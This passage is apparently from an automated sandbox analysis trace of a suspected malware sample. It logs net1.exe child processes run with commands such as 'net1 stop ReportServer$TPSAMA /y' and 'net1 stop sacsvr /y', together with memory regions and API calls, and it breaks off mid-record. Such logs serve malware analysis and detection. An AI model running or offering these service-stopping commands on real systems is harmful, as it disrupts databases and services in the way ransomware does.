= "child_process" parent_id = "239" os_parent_pid = "0x1264" cmd_line = "C:\\Windows\\system32\\net1 stop ReportServer$TPSAMA /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9487 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9488 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9489 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9490 start_va = 0x1f0000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 9491 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9492 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 9493 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9494 start_va = 0xff480000 end_va = 0xff4b2fff entry_point = 0xff480000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 9495 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9496 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 9497 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 9498 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 9499 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 9500 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9501 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9571 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9572 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9573 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9574 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 9575 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 9576 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 9577 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 9578 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 9579 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 9580 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 9581 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 9582 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 9583 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 9584 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 9585 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 9586 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 9587 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 9588 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9589 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9590 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 9591 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 9592 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 9593 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9663 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 729 os_tid = 0xec8 [0109.231] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fe50 | out: lpSystemTimeAsFileTime=0x26fe50*(dwLowDateTime=0xf6431cf0, dwHighDateTime=0x1d48689)) [0109.231] GetCurrentProcessId () returned 0xf8c [0109.231] GetCurrentThreadId () returned 0xec8 [0109.231] GetTickCount () returned 0x2507f [0109.231] QueryPerformanceCounter (in: lpPerformanceCount=0x26fe58 | out: lpPerformanceCount=0x26fe58*=1815614900000) returned 1 [0109.233] GetModuleHandleW (lpModuleName=0x0) returned 0xff480000 [0109.233] __set_app_type (_Type=0x1) [0109.233] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff499c9c) returned 0x0 [0109.233] __getmainargs (in: _Argc=0xff4a4780, _Argv=0xff4a4790, _Env=0xff4a4788, _DoWildCard=0, _StartInfo=0xff4a479c | out: _Argc=0xff4a4780, _Argv=0xff4a4790, _Env=0xff4a4788) returned 0 [0109.233] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0109.233] GetConsoleOutputCP () returned 0x1b5 [0109.251] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff4acec0 | out: lpCPInfo=0xff4acec0) returned 1 [0109.251] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0109.263] sprintf_s (in: _DstBuf=0x26fdf8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0109.263] setlocale (category=0, locale=".437") returned="English_United States.437" [0109.268] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0109.268] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0109.268] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ReportServer$TPSAMA /y" [0109.268] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x26fb90, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0109.268] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0109.268] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x26fde8 | out: Buffer=0x26fde8*=0x3a4d60) returned 0x0 [0109.268] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x26fde8 | out: Buffer=0x26fde8*=0x3ac130) returned 0x0 [0109.268] _fileno (_File=0x7fefdba2a80) returned 0 [0109.268] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0109.268] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0109.269] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0109.269] _wcsicmp (_String1="config", _String2="stop") returned -16 [0109.269] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0109.269] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0109.269] _wcsicmp (_String1="file", _String2="stop") returned -13 [0109.269] _wcsicmp (_String1="files", _String2="stop") returned -13 [0109.269] _wcsicmp (_String1="group", _String2="stop") returned -12 [0109.269] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0109.269] _wcsicmp (_String1="help", _String2="stop") returned -11 [0109.269] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0109.269] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0109.269] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0109.269] _wcsicmp (_String1="session", _String2="stop") returned -15 [0109.269] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0109.269] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0109.269] _wcsicmp (_String1="share", _String2="stop") returned -12 [0109.269] _wcsicmp (_String1="start", _String2="stop") returned -14 [0109.269] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0109.269] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0109.269] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0109.269] _wcsicmp (_String1="accounts", _String2="ReportServer$TPSAMA") returned -17 [0109.269] _wcsicmp (_String1="computer", _String2="ReportServer$TPSAMA") returned -15 [0109.269] _wcsicmp (_String1="config", _String2="ReportServer$TPSAMA") returned -15 [0109.269] _wcsicmp (_String1="continue", _String2="ReportServer$TPSAMA") returned -15 [0109.269] _wcsicmp (_String1="cont", _String2="ReportServer$TPSAMA") returned -15 [0109.269] _wcsicmp (_String1="file", _String2="ReportServer$TPSAMA") returned -12 [0109.269] _wcsicmp (_String1="files", _String2="ReportServer$TPSAMA") returned -12 [0109.269] _wcsicmp (_String1="group", _String2="ReportServer$TPSAMA") returned -11 [0109.269] _wcsicmp (_String1="groups", _String2="ReportServer$TPSAMA") returned -11 [0109.269] _wcsicmp (_String1="help", _String2="ReportServer$TPSAMA") returned -10 [0109.269] _wcsicmp (_String1="helpmsg", _String2="ReportServer$TPSAMA") returned -10 [0109.269] _wcsicmp (_String1="localgroup", _String2="ReportServer$TPSAMA") returned -6 [0109.270] _wcsicmp (_String1="pause", _String2="ReportServer$TPSAMA") returned -2 [0109.270] _wcsicmp (_String1="session", _String2="ReportServer$TPSAMA") returned 1 [0109.270] _wcsicmp (_String1="sessions", _String2="ReportServer$TPSAMA") returned 1 [0109.270] _wcsicmp (_String1="sess", _String2="ReportServer$TPSAMA") returned 1 [0109.270] _wcsicmp (_String1="share", _String2="ReportServer$TPSAMA") returned 1 [0109.270] _wcsicmp (_String1="start", _String2="ReportServer$TPSAMA") returned 1 [0109.270] _wcsicmp (_String1="stats", _String2="ReportServer$TPSAMA") returned 1 [0109.270] _wcsicmp (_String1="statistics", _String2="ReportServer$TPSAMA") returned 1 [0109.270] _wcsicmp (_String1="stop", _String2="ReportServer$TPSAMA") returned 1 [0109.270] _wcsicmp (_String1="time", _String2="ReportServer$TPSAMA") returned 2 [0109.270] _wcsicmp (_String1="user", _String2="ReportServer$TPSAMA") returned 3 [0109.270] _wcsicmp (_String1="users", _String2="ReportServer$TPSAMA") returned 3 [0109.270] _wcsicmp (_String1="msg", _String2="ReportServer$TPSAMA") returned -5 [0109.270] _wcsicmp (_String1="messenger", _String2="ReportServer$TPSAMA") returned -5 [0109.270] _wcsicmp (_String1="receiver", _String2="ReportServer$TPSAMA") returned -13 [0109.270] _wcsicmp (_String1="rcv", _String2="ReportServer$TPSAMA") returned -2 [0109.270] _wcsicmp (_String1="netpopup", _String2="ReportServer$TPSAMA") returned -4 [0109.270] _wcsicmp (_String1="redirector", _String2="ReportServer$TPSAMA") returned -12 [0109.270] _wcsicmp (_String1="redir", _String2="ReportServer$TPSAMA") returned -12 [0109.270] _wcsicmp (_String1="rdr", _String2="ReportServer$TPSAMA") returned -1 [0109.270] _wcsicmp (_String1="workstation", _String2="ReportServer$TPSAMA") returned 5 [0109.270] _wcsicmp (_String1="work", _String2="ReportServer$TPSAMA") returned 5 [0109.270] _wcsicmp (_String1="wksta", _String2="ReportServer$TPSAMA") returned 5 [0109.270] _wcsicmp (_String1="prdr", _String2="ReportServer$TPSAMA") returned -2 [0109.270] _wcsicmp (_String1="devrdr", _String2="ReportServer$TPSAMA") returned -14 [0109.270] _wcsicmp (_String1="lanmanworkstation", _String2="ReportServer$TPSAMA") returned -6 [0109.270] _wcsicmp (_String1="server", _String2="ReportServer$TPSAMA") returned 1 [0109.270] _wcsicmp (_String1="svr", _String2="ReportServer$TPSAMA") returned 1 [0109.270] _wcsicmp (_String1="srv", _String2="ReportServer$TPSAMA") returned 1 [0109.270] _wcsicmp (_String1="lanmanserver", _String2="ReportServer$TPSAMA") returned -6 [0109.270] _wcsicmp (_String1="alerter", _String2="ReportServer$TPSAMA") returned -17 [0109.270] _wcsicmp (_String1="netlogon", _String2="ReportServer$TPSAMA") returned -4 [0109.271] _wcsupr (in: _String="ReportServer$TPSAMA" | out: _String="REPORTSERVER$TPSAMA") returned="REPORTSERVER$TPSAMA" [0109.271] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3ace40 [0109.292] GetServiceKeyNameW (in: hSCManager=0x3ace40, lpDisplayName="REPORTSERVER$TPSAMA", lpServiceName=0xff4a5750, lpcchBuffer=0x26fd08 | out: lpServiceName="", lpcchBuffer=0x26fd08) returned 0 [0109.293] _wcsicmp (_String1="msg", _String2="REPORTSERVER$TPSAMA") returned -5 [0109.293] _wcsicmp (_String1="messenger", _String2="REPORTSERVER$TPSAMA") returned -5 [0109.293] _wcsicmp (_String1="receiver", _String2="REPORTSERVER$TPSAMA") returned -13 [0109.293] _wcsicmp (_String1="rcv", _String2="REPORTSERVER$TPSAMA") returned -2 [0109.293] _wcsicmp (_String1="redirector", _String2="REPORTSERVER$TPSAMA") returned -12 [0109.293] _wcsicmp (_String1="redir", _String2="REPORTSERVER$TPSAMA") returned -12 [0109.293] _wcsicmp (_String1="rdr", _String2="REPORTSERVER$TPSAMA") returned -1 [0109.293] _wcsicmp (_String1="workstation", _String2="REPORTSERVER$TPSAMA") returned 5 [0109.294] _wcsicmp (_String1="work", _String2="REPORTSERVER$TPSAMA") returned 5 [0109.294] _wcsicmp (_String1="wksta", _String2="REPORTSERVER$TPSAMA") returned 5 [0109.294] _wcsicmp (_String1="prdr", _String2="REPORTSERVER$TPSAMA") returned -2 [0109.294] _wcsicmp (_String1="devrdr", _String2="REPORTSERVER$TPSAMA") returned -14 [0109.294] _wcsicmp (_String1="lanmanworkstation", _String2="REPORTSERVER$TPSAMA") returned -6 [0109.294] _wcsicmp (_String1="server", _String2="REPORTSERVER$TPSAMA") returned 1 [0109.294] _wcsicmp (_String1="svr", _String2="REPORTSERVER$TPSAMA") returned 1 [0109.294] _wcsicmp (_String1="srv", _String2="REPORTSERVER$TPSAMA") returned 1 [0109.294] _wcsicmp (_String1="lanmanserver", _String2="REPORTSERVER$TPSAMA") returned -6 [0109.294] _wcsicmp (_String1="alerter", _String2="REPORTSERVER$TPSAMA") returned -17 [0109.294] _wcsicmp (_String1="netlogon", _String2="REPORTSERVER$TPSAMA") returned -4 [0109.294] NetServiceControl (in: servername=0x0, service="REPORTSERVER$TPSAMA", opcode=0x0, arg=0x0, bufptr=0x26fd10 | out: bufptr=0x26fd10) returned 0x889 [0109.297] wcscpy_s (in: _Destination=0xff4a80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0109.297] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0109.298] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff4a5b50, nSize=0x800, Arguments=0xff4a7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0109.299] GetFileType (hFile=0xb) returned 0x2 [0109.302] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fbd8 | out: lpMode=0x26fbd8) returned 1 [0109.303] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff4a5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x26fbd0, lpReserved=0x0 | out: lpBuffer=0xff4a5b50*, lpNumberOfCharsWritten=0x26fbd0*=0x1e) returned 1 [0109.303] GetFileType (hFile=0xb) returned 0x2 [0109.304] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fbd8 | out: lpMode=0x26fbd8) returned 1 [0109.304] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff481efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26fbd0, lpReserved=0x0 | out: lpBuffer=0xff481efc*, lpNumberOfCharsWritten=0x26fbd0*=0x2) returned 1 [0109.305] _ultow (in: _Dest=0x889, _Radix=2554944 | out: _Dest=0x889) returned="2185" [0109.305] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff4a5b50, nSize=0x800, Arguments=0xff4a7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0109.305] GetFileType (hFile=0xb) returned 0x2 [0109.306] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fbd8 | out: lpMode=0x26fbd8) returned 1 [0109.306] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff4a5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x26fbd0, lpReserved=0x0 | out: lpBuffer=0xff4a5b50*, lpNumberOfCharsWritten=0x26fbd0*=0x34) returned 1 [0109.307] GetFileType (hFile=0xb) returned 0x2 [0109.307] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fbd8 | out: lpMode=0x26fbd8) returned 1 [0109.308] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff481efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26fbd0, lpReserved=0x0 | out: lpBuffer=0xff481efc*, lpNumberOfCharsWritten=0x26fbd0*=0x2) returned 1 [0109.308] NetApiBufferFree (Buffer=0x3a4d60) returned 0x0 [0109.309] NetApiBufferFree (Buffer=0x3ac130) returned 0x0 [0109.309] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ReportServer$TPSAMA /y" [0109.309] exit (_Code=2) Process: id = "253" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5f917000" os_pid = "0xf04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "244" os_parent_pid = "0xd40" cmd_line = "C:\\Windows\\system32\\net1 stop sacsvr /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9502 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9503 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9504 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9505 start_va = 0x70000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 9506 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9507 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 9508 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9509 start_va = 0xff480000 end_va = 0xff4b2fff entry_point = 0xff480000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 9510 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9511 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 9512 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 9513 start_va = 0x7fffffde000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 9514 start_va = 0x120000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 9515 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9516 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9594 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9595 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9596 start_va = 0x220000 end_va = 0x286fff entry_point = 0x220000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9597 start_va = 0x320000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 9598 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 9599 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 9600 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 9601 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 9602 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 9603 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 9604 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 9605 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 9606 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 9607 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 9608 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 9609 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 9610 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 9611 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9612 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9613 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 9614 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 9615 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = 